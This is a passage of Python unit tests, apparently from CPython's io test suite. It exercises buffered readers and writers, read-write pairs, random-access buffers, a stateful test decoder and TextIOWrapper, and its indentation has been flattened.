with support.check_warnings(('', ResourceWarning)):
rawio = self.FileIO(support.TESTFN, "w+b")
f = self.tp(rawio)
f.f = f
wr = weakref.ref(f)
del f
support.gc_collect()
self.assertIsNone(wr(), wr)
def test_args_error(self):
# Issue #17275
with self.assertRaisesRegex(TypeError, "BufferedReader"):
self.tp(io.BytesIO(), 1024, 1024, 1024)
class PyBufferedReaderTest(BufferedReaderTest):
tp = pyio.BufferedReader
class BufferedWriterTest(unittest.TestCase, CommonBufferedTests):
write_mode = "wb"
def test_constructor(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
bufio.__init__(rawio)
bufio.__init__(rawio, buffer_size=1024)
bufio.__init__(rawio, buffer_size=16)
self.assertEqual(3, bufio.write(b"abc"))
bufio.flush()
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
bufio.__init__(rawio)
self.assertEqual(3, bufio.write(b"ghi"))
bufio.flush()
self.assertEqual(b"".join(rawio._write_stack), b"abcghi")
def test_uninitialized(self):
bufio = self.tp.__new__(self.tp)
del bufio
bufio = self.tp.__new__(self.tp)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute',
bufio.write, b'')
bufio.__init__(self.MockRawIO())
self.assertEqual(bufio.write(b''), 0)
def test_detach_flush(self):
raw = self.MockRawIO()
buf = self.tp(raw)
buf.write(b"howdy!")
self.assertFalse(raw._write_stack)
buf.detach()
self.assertEqual(raw._write_stack, [b"howdy!"])
def test_write(self):
# Write to the buffered IO but don't overflow the buffer.
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.write(b"abc")
self.assertFalse(writer._write_stack)
buffer = bytearray(b"def")
bufio.write(buffer)
buffer[:] = b"***" # Overwrite our copy of the data
bufio.flush()
self.assertEqual(b"".join(writer._write_stack), b"abcdef")
def test_write_overflow(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
contents = b"abcdefghijklmnop"
for n in range(0, len(contents), 3):
bufio.write(contents[n:n+3])
flushed = b"".join(writer._write_stack)
# At least (total - 8) bytes were implicitly flushed, perhaps more
# depending on the implementation.
self.assertTrue(flushed.startswith(contents[:-8]), flushed)
def check_writes(self, intermediate_func):
# Lots of writes, test the flushed output is as expected.
contents = bytes(range(256)) * 1000
n = 0
writer = self.MockRawIO()
bufio = self.tp(writer, 13)
# Generator of write sizes: repeat each N 15 times then proceed to N+1
def gen_sizes():
for size in count(1):
for i in range(15):
yield size
sizes = gen_sizes()
while n < len(contents):
size = min(next(sizes), len(contents) - n)
self.assertEqual(bufio.write(contents[n:n+size]), size)
intermediate_func(bufio)
n += size
bufio.flush()
self.assertEqual(contents, b"".join(writer._write_stack))
def test_writes(self):
self.check_writes(lambda bufio: None)
def test_writes_and_flushes(self):
self.check_writes(lambda bufio: bufio.flush())
def test_writes_and_seeks(self):
def _seekabs(bufio):
pos = bufio.tell()
bufio.seek(pos + 1, 0)
bufio.seek(pos - 1, 0)
bufio.seek(pos, 0)
self.check_writes(_seekabs)
def _seekrel(bufio):
pos = bufio.seek(0, 1)
bufio.seek(+1, 1)
bufio.seek(-1, 1)
bufio.seek(pos, 0)
self.check_writes(_seekrel)
def test_writes_and_truncates(self):
self.check_writes(lambda bufio: bufio.truncate(bufio.tell()))
def test_write_non_blocking(self):
raw = self.MockNonBlockWriterIO()
bufio = self.tp(raw, 8)
self.assertEqual(bufio.write(b"abcd"), 4)
self.assertEqual(bufio.write(b"efghi"), 5)
# 1 byte will be written, the rest will be buffered
raw.block_on(b"k")
self.assertEqual(bufio.write(b"jklmn"), 5)
# 8 bytes will be written, 8 will be buffered and the rest will be lost
raw.block_on(b"0")
try:
bufio.write(b"opqrwxyz0123456789")
except self.BlockingIOError as e:
written = e.characters_written
else:
self.fail("BlockingIOError should have been raised")
self.assertEqual(written, 16)
self.assertEqual(raw.pop_written(),
b"abcdefghijklmnopqrwxyz")
self.assertEqual(bufio.write(b"ABCDEFGHI"), 9)
s = raw.pop_written()
# Previously buffered bytes were flushed
self.assertTrue(s.startswith(b"01234567A"), s)
def test_write_and_rewind(self):
raw = io.BytesIO()
bufio = self.tp(raw, 4)
self.assertEqual(bufio.write(b"abcdef"), 6)
self.assertEqual(bufio.tell(), 6)
bufio.seek(0, 0)
self.assertEqual(bufio.write(b"XY"), 2)
bufio.seek(6, 0)
self.assertEqual(raw.getvalue(), b"XYcdef")
self.assertEqual(bufio.write(b"123456"), 6)
bufio.flush()
self.assertEqual(raw.getvalue(), b"XYcdef123456")
def test_flush(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.write(b"abc")
bufio.flush()
self.assertEqual(b"abc", writer._write_stack[0])
def test_writelines(self):
l = [b'ab', b'cd', b'ef']
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.writelines(l)
bufio.flush()
self.assertEqual(b''.join(writer._write_stack), b'abcdef')
def test_writelines_userlist(self):
l = UserList([b'ab', b'cd', b'ef'])
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.writelines(l)
bufio.flush()
self.assertEqual(b''.join(writer._write_stack), b'abcdef')
def test_writelines_error(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
self.assertRaises(TypeError, bufio.writelines, [1, 2, 3])
self.assertRaises(TypeError, bufio.writelines, None)
self.assertRaises(TypeError, bufio.writelines, 'abc')
def test_destructor(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.write(b"abc")
del bufio
support.gc_collect()
self.assertEqual(b"abc", writer._write_stack[0])
def test_truncate(self):
# Truncate implicitly flushes the buffer.
self.addCleanup(support.unlink, support.TESTFN)
with self.open(support.TESTFN, self.write_mode, buffering=0) as raw:
bufio = self.tp(raw, 8)
bufio.write(b"abcdef")
self.assertEqual(bufio.truncate(3), 3)
self.assertEqual(bufio.tell(), 6)
with self.open(support.TESTFN, "rb", buffering=0) as f:
self.assertEqual(f.read(), b"abc")
def test_truncate_after_write(self):
# Ensure that truncate preserves the file position after
# writes longer than the buffer size.
# Issue: https://bugs.python.org/issue32228
self.addCleanup(support.unlink, support.TESTFN)
with self.open(support.TESTFN, "wb") as f:
# Fill with some buffer
f.write(b'\x00' * 10000)
buffer_sizes = [8192, 4096, 200]
for buffer_size in buffer_sizes:
with self.open(support.TESTFN, "r+b", buffering=buffer_size) as f:
f.write(b'\x00' * (buffer_size + 1))
# After write write_pos and write_end are set to 0
f.read(1)
# read operation makes sure that pos != raw_pos
f.truncate()
self.assertEqual(f.tell(), buffer_size + 2)
@support.requires_resource('cpu')
def test_threads(self):
try:
# Write out many bytes from many threads and test they were
# all flushed.
N = 1000
contents = bytes(range(256)) * N
sizes = cycle([1, 19])
n = 0
queue = deque()
while n < len(contents):
size = next(sizes)
queue.append(contents[n:n+size])
n += size
del contents
# We use a real file object because it allows us to
# exercise situations where the GIL is released before
# writing the buffer to the raw streams. This is in addition
# to concurrency issues due to switching threads in the middle
# of Python code.
with self.open(support.TESTFN, self.write_mode, buffering=0) as raw:
bufio = self.tp(raw, 8)
errors = []
def f():
try:
while True:
try:
s = queue.popleft()
except IndexError:
return
bufio.write(s)
except Exception as e:
errors.append(e)
raise
threads = [threading.Thread(target=f) for x in range(20)]
with support.start_threads(threads):
time.sleep(0.02) # yield
self.assertFalse(errors,
"the following exceptions were caught: %r" % errors)
bufio.close()
with self.open(support.TESTFN, "rb") as f:
s = f.read()
for i in range(256):
self.assertEqual(s.count(bytes([i])), N)
finally:
support.unlink(support.TESTFN)
def test_misbehaved_io(self):
rawio = self.MisbehavedRawIO()
bufio = self.tp(rawio, 5)
self.assertRaises(OSError, bufio.seek, 0)
self.assertRaises(OSError, bufio.tell)
self.assertRaises(OSError, bufio.write, b"abcdef")
# Silence destructor error
bufio.close = lambda: None
def test_max_buffer_size_removal(self):
with self.assertRaises(TypeError):
self.tp(self.MockRawIO(), 8, 12)
def test_write_error_on_close(self):
raw = self.MockRawIO()
def bad_write(b):
raise OSError()
raw.write = bad_write
b = self.tp(raw)
b.write(b'spam')
self.assertRaises(OSError, b.close) # exception not swallowed
self.assertTrue(b.closed)
def test_slow_close_from_thread(self):
# Issue #31976
rawio = self.SlowFlushRawIO()
bufio = self.tp(rawio, 8)
t = threading.Thread(target=bufio.close)
t.start()
rawio.in_flush.wait()
self.assertRaises(ValueError, bufio.write, b'spam')
self.assertTrue(bufio.closed)
t.join()
class CBufferedWriterTest(BufferedWriterTest, SizeofTest):
tp = io.BufferedWriter
@unittest.skipIf(MEMORY_SANITIZER, "MSan defaults to crashing "
"instead of returning NULL for malloc failure.")
def test_constructor(self):
BufferedWriterTest.test_constructor(self)
# The allocation can succeed on 32-bit builds, e.g. with more
# than 2 GiB RAM and a 64-bit kernel.
if sys.maxsize > 0x7FFFFFFF:
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises((OverflowError, MemoryError, ValueError),
bufio.__init__, rawio, sys.maxsize)
def test_initialization(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.write, b"def")
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.write, b"def")
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
self.assertRaises(ValueError, bufio.write, b"def")
def test_garbage_collection(self):
# C BufferedWriter objects are collected, and collecting them flushes
# all data to disk.
# The Python version has __del__, so it ends into gc.garbage instead
self.addCleanup(support.unlink, support.TESTFN)
with support.check_warnings(('', ResourceWarning)):
rawio = self.FileIO(support.TESTFN, "w+b")
f = self.tp(rawio)
f.write(b"123xxx")
f.x = f
wr = weakref.ref(f)
del f
support.gc_collect()
self.assertIsNone(wr(), wr)
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"123xxx")
def test_args_error(self):
# Issue #17275
with self.assertRaisesRegex(TypeError, "BufferedWriter"):
self.tp(io.BytesIO(), 1024, 1024, 1024)
class PyBufferedWriterTest(BufferedWriterTest):
tp = pyio.BufferedWriter
class BufferedRWPairTest(unittest.TestCase):
def test_constructor(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertFalse(pair.closed)
def test_uninitialized(self):
pair = self.tp.__new__(self.tp)
del pair
pair = self.tp.__new__(self.tp)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute',
pair.read, 0)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute',
pair.write, b'')
pair.__init__(self.MockRawIO(), self.MockRawIO())
self.assertEqual(pair.read(0), b'')
self.assertEqual(pair.write(b''), 0)
def test_detach(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertRaises(self.UnsupportedOperation, pair.detach)
def test_constructor_max_buffer_size_removal(self):
with self.assertRaises(TypeError):
self.tp(self.MockRawIO(), self.MockRawIO(), 8, 12)
def test_constructor_with_not_readable(self):
class NotReadable(MockRawIO):
def readable(self):
return False
self.assertRaises(OSError, self.tp, NotReadable(), self.MockRawIO())
def test_constructor_with_not_writeable(self):
class NotWriteable(MockRawIO):
def writable(self):
return False
self.assertRaises(OSError, self.tp, self.MockRawIO(), NotWriteable())
def test_read(self):
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
self.assertEqual(pair.read(3), b"abc")
self.assertEqual(pair.read(1), b"d")
self.assertEqual(pair.read(), b"ef")
pair = self.tp(self.BytesIO(b"abc"), self.MockRawIO())
self.assertEqual(pair.read(None), b"abc")
def test_readlines(self):
pair = lambda: self.tp(self.BytesIO(b"abc\ndef\nh"), self.MockRawIO())
self.assertEqual(pair().readlines(), [b"abc\n", b"def\n", b"h"])
self.assertEqual(pair().readlines(), [b"abc\n", b"def\n", b"h"])
self.assertEqual(pair().readlines(5), [b"abc\n", b"def\n"])
def test_read1(self):
# .read1() is delegated to the underlying reader object, so this test
# can be shallow.
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
self.assertEqual(pair.read1(3), b"abc")
self.assertEqual(pair.read1(), b"def")
def test_readinto(self):
for method in ("readinto", "readinto1"):
with self.subTest(method):
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
data = byteslike(b'\0' * 5)
self.assertEqual(getattr(pair, method)(data), 5)
self.assertEqual(bytes(data), b"abcde")
def test_write(self):
w = self.MockRawIO()
pair = self.tp(self.MockRawIO(), w)
pair.write(b"abc")
pair.flush()
buffer = bytearray(b"def")
pair.write(buffer)
buffer[:] = b"***" # Overwrite our copy of the data
pair.flush()
self.assertEqual(w._write_stack, [b"abc", b"def"])
def test_peek(self):
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
self.assertTrue(pair.peek(3).startswith(b"abc"))
self.assertEqual(pair.read(3), b"abc")
def test_readable(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertTrue(pair.readable())
def test_writeable(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertTrue(pair.writable())
def test_seekable(self):
# BufferedRWPairs are never seekable, even if their readers and writers
# are.
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertFalse(pair.seekable())
# .flush() is delegated to the underlying writer object and has been
# tested in the test_write method.
def test_close_and_closed(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertFalse(pair.closed)
pair.close()
self.assertTrue(pair.closed)
def test_reader_close_error_on_close(self):
def reader_close():
reader_non_existing
reader = self.MockRawIO()
reader.close = reader_close
writer = self.MockRawIO()
pair = self.tp(reader, writer)
with self.assertRaises(NameError) as err:
pair.close()
self.assertIn('reader_non_existing', str(err.exception))
self.assertTrue(pair.closed)
self.assertFalse(reader.closed)
self.assertTrue(writer.closed)
# Silence destructor error
reader.close = lambda: None
def test_writer_close_error_on_close(self):
def writer_close():
writer_non_existing
reader = self.MockRawIO()
writer = self.MockRawIO()
writer.close = writer_close
pair = self.tp(reader, writer)
with self.assertRaises(NameError) as err:
pair.close()
self.assertIn('writer_non_existing', str(err.exception))
self.assertFalse(pair.closed)
self.assertTrue(reader.closed)
self.assertFalse(writer.closed)
# Silence destructor error
writer.close = lambda: None
writer = None
# Ignore BufferedWriter (of the BufferedRWPair) unraisable exception
with support.catch_unraisable_exception():
# Ignore BufferedRWPair unraisable exception
with support.catch_unraisable_exception():
pair = None
support.gc_collect()
support.gc_collect()
def test_reader_writer_close_error_on_close(self):
def reader_close():
reader_non_existing
def writer_close():
writer_non_existing
reader = self.MockRawIO()
reader.close = reader_close
writer = self.MockRawIO()
writer.close = writer_close
pair = self.tp(reader, writer)
with self.assertRaises(NameError) as err:
pair.close()
self.assertIn('reader_non_existing', str(err.exception))
self.assertIsInstance(err.exception.__context__, NameError)
self.assertIn('writer_non_existing', str(err.exception.__context__))
self.assertFalse(pair.closed)
self.assertFalse(reader.closed)
self.assertFalse(writer.closed)
# Silence destructor error
reader.close = lambda: None
writer.close = lambda: None
def test_isatty(self):
class SelectableIsAtty(MockRawIO):
def __init__(self, isatty):
MockRawIO.__init__(self)
self._isatty = isatty
def isatty(self):
return self._isatty
pair = self.tp(SelectableIsAtty(False), SelectableIsAtty(False))
self.assertFalse(pair.isatty())
pair = self.tp(SelectableIsAtty(True), SelectableIsAtty(False))
self.assertTrue(pair.isatty())
pair = self.tp(SelectableIsAtty(False), SelectableIsAtty(True))
self.assertTrue(pair.isatty())
pair = self.tp(SelectableIsAtty(True), SelectableIsAtty(True))
self.assertTrue(pair.isatty())
def test_weakref_clearing(self):
brw = self.tp(self.MockRawIO(), self.MockRawIO())
ref = weakref.ref(brw)
brw = None
ref = None # Shouldn't segfault.
class CBufferedRWPairTest(BufferedRWPairTest):
tp = io.BufferedRWPair
class PyBufferedRWPairTest(BufferedRWPairTest):
tp = pyio.BufferedRWPair
class BufferedRandomTest(BufferedReaderTest, BufferedWriterTest):
read_mode = "rb+"
write_mode = "wb+"
def test_constructor(self):
BufferedReaderTest.test_constructor(self)
BufferedWriterTest.test_constructor(self)
def test_uninitialized(self):
BufferedReaderTest.test_uninitialized(self)
BufferedWriterTest.test_uninitialized(self)
def test_read_and_write(self):
raw = self.MockRawIO((b"asdf", b"ghjk"))
rw = self.tp(raw, 8)
self.assertEqual(b"as", rw.read(2))
rw.write(b"ddd")
rw.write(b"eee")
self.assertFalse(raw._write_stack) # Buffer writes
self.assertEqual(b"ghjk", rw.read())
self.assertEqual(b"dddeee", raw._write_stack[0])
def test_seek_and_tell(self):
raw = self.BytesIO(b"asdfghjkl")
rw = self.tp(raw)
self.assertEqual(b"as", rw.read(2))
self.assertEqual(2, rw.tell())
rw.seek(0, 0)
self.assertEqual(b"asdf", rw.read(4))
rw.write(b"123f")
rw.seek(0, 0)
self.assertEqual(b"asdf123fl", rw.read())
self.assertEqual(9, rw.tell())
rw.seek(-4, 2)
self.assertEqual(5, rw.tell())
rw.seek(2, 1)
self.assertEqual(7, rw.tell())
self.assertEqual(b"fl", rw.read(11))
rw.flush()
self.assertEqual(b"asdf123fl", raw.getvalue())
self.assertRaises(TypeError, rw.seek, 0.0)
def check_flush_and_read(self, read_func):
raw = self.BytesIO(b"abcdefghi")
bufio = self.tp(raw)
self.assertEqual(b"ab", read_func(bufio, 2))
bufio.write(b"12")
self.assertEqual(b"ef", read_func(bufio, 2))
self.assertEqual(6, bufio.tell())
bufio.flush()
self.assertEqual(6, bufio.tell())
self.assertEqual(b"ghi", read_func(bufio))
raw.seek(0, 0)
raw.write(b"XYZ")
# flush() resets the read buffer
bufio.flush()
bufio.seek(0, 0)
self.assertEqual(b"XYZ", read_func(bufio, 3))
def test_flush_and_read(self):
self.check_flush_and_read(lambda bufio, *args: bufio.read(*args))
def test_flush_and_readinto(self):
def _readinto(bufio, n=-1):
b = bytearray(n if n >= 0 else 9999)
n = bufio.readinto(b)
return bytes(b[:n])
self.check_flush_and_read(_readinto)
def test_flush_and_peek(self):
def _peek(bufio, n=-1):
# This relies on the fact that the buffer can contain the whole
# raw stream, otherwise peek() can return less.
b = bufio.peek(n)
if n != -1:
b = b[:n]
bufio.seek(len(b), 1)
return b
self.check_flush_and_read(_peek)
def test_flush_and_write(self):
raw = self.BytesIO(b"abcdefghi")
bufio = self.tp(raw)
bufio.write(b"123")
bufio.flush()
bufio.write(b"45")
bufio.flush()
bufio.seek(0, 0)
self.assertEqual(b"12345fghi", raw.getvalue())
self.assertEqual(b"12345fghi", bufio.read())
def test_threads(self):
BufferedReaderTest.test_threads(self)
BufferedWriterTest.test_threads(self)
def test_writes_and_peek(self):
def _peek(bufio):
bufio.peek(1)
self.check_writes(_peek)
def _peek(bufio):
pos = bufio.tell()
bufio.seek(-1, 1)
bufio.peek(1)
bufio.seek(pos, 0)
self.check_writes(_peek)
def test_writes_and_reads(self):
def _read(bufio):
bufio.seek(-1, 1)
bufio.read(1)
self.check_writes(_read)
def test_writes_and_read1s(self):
def _read1(bufio):
bufio.seek(-1, 1)
bufio.read1(1)
self.check_writes(_read1)
def test_writes_and_readintos(self):
def _read(bufio):
bufio.seek(-1, 1)
bufio.readinto(bytearray(1))
self.check_writes(_read)
def test_write_after_readahead(self):
# Issue #6629: writing after the buffer was filled by readahead should
# first rewind the raw stream.
for overwrite_size in [1, 5]:
raw = self.BytesIO(b"A" * 10)
bufio = self.tp(raw, 4)
# Trigger readahead
self.assertEqual(bufio.read(1), b"A")
self.assertEqual(bufio.tell(), 1)
# Overwriting should rewind the raw stream if it needs so
bufio.write(b"B" * overwrite_size)
self.assertEqual(bufio.tell(), overwrite_size + 1)
# If the write size was smaller than the buffer size, flush() and
# check that rewind happens.
bufio.flush()
self.assertEqual(bufio.tell(), overwrite_size + 1)
s = raw.getvalue()
self.assertEqual(s,
b"A" + b"B" * overwrite_size + b"A" * (9 - overwrite_size))
def test_write_rewind_write(self):
# Various combinations of reading / writing / seeking backwards / writing again
def mutate(bufio, pos1, pos2):
assert pos2 >= pos1
# Fill the buffer
bufio.seek(pos1)
bufio.read(pos2 - pos1)
bufio.write(b'\x02')
# This writes earlier than the previous write, but still inside
# the buffer.
bufio.seek(pos1)
bufio.write(b'\x01')
b = b"\x80\x81\x82\x83\x84"
for i in range(0, len(b)):
for j in range(i, len(b)):
raw = self.BytesIO(b)
bufio = self.tp(raw, 100)
mutate(bufio, i, j)
bufio.flush()
expected = bytearray(b)
expected[j] = 2
expected[i] = 1
self.assertEqual(raw.getvalue(), expected,
"failed result for i=%d, j=%d" % (i, j))
def test_truncate_after_read_or_write(self):
raw = self.BytesIO(b"A" * 10)
bufio = self.tp(raw, 100)
self.assertEqual(bufio.read(2), b"AA") # the read buffer gets filled
self.assertEqual(bufio.truncate(), 2)
self.assertEqual(bufio.write(b"BB"), 2) # the write buffer increases
self.assertEqual(bufio.truncate(), 4)
def test_misbehaved_io(self):
BufferedReaderTest.test_misbehaved_io(self)
BufferedWriterTest.test_misbehaved_io(self)
def test_interleaved_read_write(self):
# Test for issue #12213
with self.BytesIO(b'abcdefgh') as raw:
with self.tp(raw, 100) as f:
f.write(b"1")
self.assertEqual(f.read(1), b'b')
f.write(b'2')
self.assertEqual(f.read1(1), b'd')
f.write(b'3')
buf = bytearray(1)
f.readinto(buf)
self.assertEqual(buf, b'f')
f.write(b'4')
self.assertEqual(f.peek(1), b'h')
f.flush()
self.assertEqual(raw.getvalue(), b'1b2d3f4h')
with self.BytesIO(b'abc') as raw:
with self.tp(raw, 100) as f:
self.assertEqual(f.read(1), b'a')
f.write(b"2")
self.assertEqual(f.read(1), b'c')
f.flush()
self.assertEqual(raw.getvalue(), b'a2c')
def test_interleaved_readline_write(self):
with self.BytesIO(b'ab\ncdef\ng\n') as raw:
with self.tp(raw) as f:
f.write(b'1')
self.assertEqual(f.readline(), b'b\n')
f.write(b'2')
self.assertEqual(f.readline(), b'def\n')
f.write(b'3')
self.assertEqual(f.readline(), b'\n')
f.flush()
self.assertEqual(raw.getvalue(), b'1b\n2def\n3\n')
# You can't construct a BufferedRandom over a non-seekable stream.
test_unseekable = None
class CBufferedRandomTest(BufferedRandomTest, SizeofTest):
tp = io.BufferedRandom
@unittest.skipIf(MEMORY_SANITIZER, "MSan defaults to crashing "
"instead of returning NULL for malloc failure.")
def test_constructor(self):
BufferedRandomTest.test_constructor(self)
# The allocation can succeed on 32-bit builds, e.g. with more
# than 2 GiB RAM and a 64-bit kernel.
if sys.maxsize > 0x7FFFFFFF:
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises((OverflowError, MemoryError, ValueError),
bufio.__init__, rawio, sys.maxsize)
def test_garbage_collection(self):
CBufferedReaderTest.test_garbage_collection(self)
CBufferedWriterTest.test_garbage_collection(self)
def test_args_error(self):
# Issue #17275
with self.assertRaisesRegex(TypeError, "BufferedRandom"):
self.tp(io.BytesIO(), 1024, 1024, 1024)
class PyBufferedRandomTest(BufferedRandomTest):
tp = pyio.BufferedRandom
# To fully exercise seek/tell, the StatefulIncrementalDecoder has these
# properties:
# - A single output character can correspond to many bytes of input.
# - The number of input bytes to complete the character can be
# undetermined until the last input byte is received.
# - The number of input bytes can vary depending on previous input.
# - A single input byte can correspond to many characters of output.
# - The number of output characters can be undetermined until the
# last input byte is received.
# - The number of output characters can vary depending on previous input.
class StatefulIncrementalDecoder(codecs.IncrementalDecoder):
"""
For testing seek/tell behavior with a stateful, buffering decoder.
Input is a sequence of words. Words may be fixed-length (length set
by input) or variable-length (period-terminated). In variable-length
mode, extra periods are ignored. Possible words are:
- 'i' followed by a number sets the input length, I (maximum 99).
When I is set to 0, words are space-terminated.
- 'o' followed by a number sets the output length, O (maximum 99).
- Any other word is converted into a word followed by a period on
the output. The output word consists of the input word truncated
or padded out with hyphens to make its length equal to O. If O
is 0, the word is output verbatim without truncating or padding.
I and O are initially set to 1. When I changes, any buffered input is
re-scanned according to the new I. EOF also terminates the last word.
"""
def __init__(self, errors='strict'):
codecs.IncrementalDecoder.__init__(self, errors)
self.reset()
def __repr__(self):
return '<SID %x>' % id(self)
def reset(self):
self.i = 1
self.o = 1
self.buffer = bytearray()
def getstate(self):
i, o = self.i ^ 1, self.o ^ 1 # so that flags = 0 after reset()
return bytes(self.buffer), i*100 + o
def setstate(self, state):
buffer, io = state
self.buffer = bytearray(buffer)
i, o = divmod(io, 100)
self.i, self.o = i ^ 1, o ^ 1
def decode(self, input, final=False):
output = ''
for b in input:
if self.i == 0: # variable-length, terminated with period
if b == ord('.'):
if self.buffer:
output += self.process_word()
else:
self.buffer.append(b)
else: # fixed-length, terminate after self.i bytes
self.buffer.append(b)
if len(self.buffer) == self.i:
output += self.process_word()
if final and self.buffer: # EOF terminates the last word
output += self.process_word()
return output
def process_word(self):
output = ''
if self.buffer[0] == ord('i'):
self.i = min(99, int(self.buffer[1:] or 0)) # set input length
elif self.buffer[0] == ord('o'):
self.o = min(99, int(self.buffer[1:] or 0)) # set output length
else:
output = self.buffer.decode('ascii')
if len(output) < self.o:
output += '-'*self.o # pad out with hyphens
if self.o:
output = output[:self.o] # truncate to output length
output += '.'
self.buffer = bytearray()
return output
codecEnabled = False
@classmethod
def lookupTestDecoder(cls, name):
if cls.codecEnabled and name == 'test_decoder':
latin1 = codecs.lookup('latin-1')
return codecs.CodecInfo(
name='test_decoder', encode=latin1.encode, decode=None,
incrementalencoder=None,
streamreader=None, streamwriter=None,
incrementaldecoder=cls)
# Register the previous decoder for testing.
# Disabled by default, tests will enable it.
codecs.register(StatefulIncrementalDecoder.lookupTestDecoder)
class StatefulIncrementalDecoderTest(unittest.TestCase):
"""
Make sure the StatefulIncrementalDecoder actually works.
"""
test_cases = [
# I=1, O=1 (fixed-length input == fixed-length output)
(b'abcd', False, 'a.b.c.d.'),
# I=0, O=0 (variable-length input, variable-length output)
(b'oiabcd', True, 'abcd.'),
# I=0, O=0 (should ignore extra periods)
(b'oi...abcd...', True, 'abcd.'),
# I=0, O=6 (variable-length input, fixed-length output)
(b'i.o6.x.xyz.toolongtofit.', False, 'x-----.xyz---.toolon.'),
# I=2, O=6 (fixed-length input < fixed-length output)
(b'i.i2.o6xyz', True, 'xy----.z-----.'),
# I=6, O=3 (fixed-length input > fixed-length output)
(b'i.o3.i6.abcdefghijklmnop', True, 'abc.ghi.mno.'),
# I=0, then 3; O=29, then 15 (with longer output)
(b'i.o29.a.b.cde.o15.abcdefghijabcdefghij.i3.a.b.c.d.ei00k.l.m', True,
'a----------------------------.' +
'b----------------------------.' +
'cde--------------------------.' +
'abcdefghijabcde.' +
'a.b------------.' +
'.c.------------.' +
'd.e------------.' +
'k--------------.' +
'l--------------.' +
'm--------------.')
]
def test_decoder(self):
# Try a few one-shot test cases.
for input, eof, output in self.test_cases:
d = StatefulIncrementalDecoder()
self.assertEqual(d.decode(input, eof), output)
# Also test an unfinished decode, followed by forcing EOF.
d = StatefulIncrementalDecoder()
self.assertEqual(d.decode(b'oiabcd'), '')
self.assertEqual(d.decode(b'', 1), 'abcd.')
class TextIOWrapperTest(unittest.TestCase):
def setUp(self):
self.testdata = b"AAA\r\nBBB\rCCC\r\nDDD\nEEE\r\n"
self.normalized = b"AAA\nBBB\nCCC\nDDD\nEEE\n".decode("ascii")
support.unlink(support.TESTFN)
def tearDown(self):
support.unlink(support.TESTFN)
def test_constructor(self):
r = self.BytesIO(b"\xc3\xa9\n\n")
b = self.BufferedReader(r, 1000)
t = self.TextIOWrapper(b)
t.__init__(b, encoding="latin-1", newline="\r\n")
self.assertEqual(t.encoding, "latin-1")
self.assertEqual(t.line_buffering, False)
t.__init__(b, encoding="utf-8", line_buffering=True)
self.assertEqual(t.encoding, "utf-8")
self.assertEqual(t.line_buffering, True)
self.assertEqual("\xe9\n", t.readline())
self.assertRaises(TypeError, t.__init__, b, newline=42)
self.assertRaises(ValueError, t.__init__, b, newline='xyzzy')
def test_uninitialized(self):
t = self.TextIOWrapper.__new__(self.TextIOWrapper)
del t
t = self.TextIOWrapper.__new__(self.TextIOWrapper)
self.assertRaises(Exception, repr, t)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute',
t.read, 0)
t.__init__(self.MockRawIO())
self.assertEqual(t.read(0), '')
def test_non_text_encoding_codecs_are_rejected(self):
# Ensure the constructor complains if passed a codec that isn't
# marked as a text encoding
# http://bugs.python.org/issue20404
r = self.BytesIO()
b = self.BufferedWriter(r)
with self.assertRaisesRegex(LookupError, "is not a text encoding"):
self.TextIOWrapper(b, encoding="hex")
def test_detach(self):
r = self.BytesIO()
b = self.BufferedWriter(r)
t = self.TextIOWrapper(b)
self.assertIs(t.detach(), b)
t = self.TextIOWrapper(b, encoding="ascii")
t.write("howdy")
self.assertFalse(r.getvalue())
t.detach()
self.assertEqual(r.getvalue(), b"howdy")
self.assertRaises(ValueError, t.detach)
# Operations independent of the detached stream should still work
repr(t)
self.assertEqual(t.encoding, "ascii")
self.assertEqual(t.errors, "strict")
self.assertFalse(t.line_buffering)
self.assertFalse(t.write_through)
def test_repr(self):
raw = self.BytesIO("hello".encode("utf-8"))
b = self.BufferedReader(raw)
t = self.TextIOWrapper(b, encoding="utf-8")
modname = self.TextIOWrapper.__module__
self.assertRegex(repr(t),
r"<(%s\.)?TextIOWrapper encoding='utf-8'>" % modname)
raw.name = "dummy"
self.assertRegex(repr(t),
r"<(%s\.)?TextIOWrapper name='dummy' encoding='utf-8'>" % modname)
t.mode = "r"
self.assertRegex(repr(t),
r"<(%s\.)?TextIOWrapper name='dummy' mode='r' encoding='utf-8'>" % modname)
raw.name = b"dummy"
self.assertRegex(repr(t),
r"<(%s\.)?TextIOWrapper name=b'dummy' mode='r' encoding='utf-8'>" % modname)
t.buffer.detach()
repr(t) # Should not raise an exception
def test_recursive_repr(self):
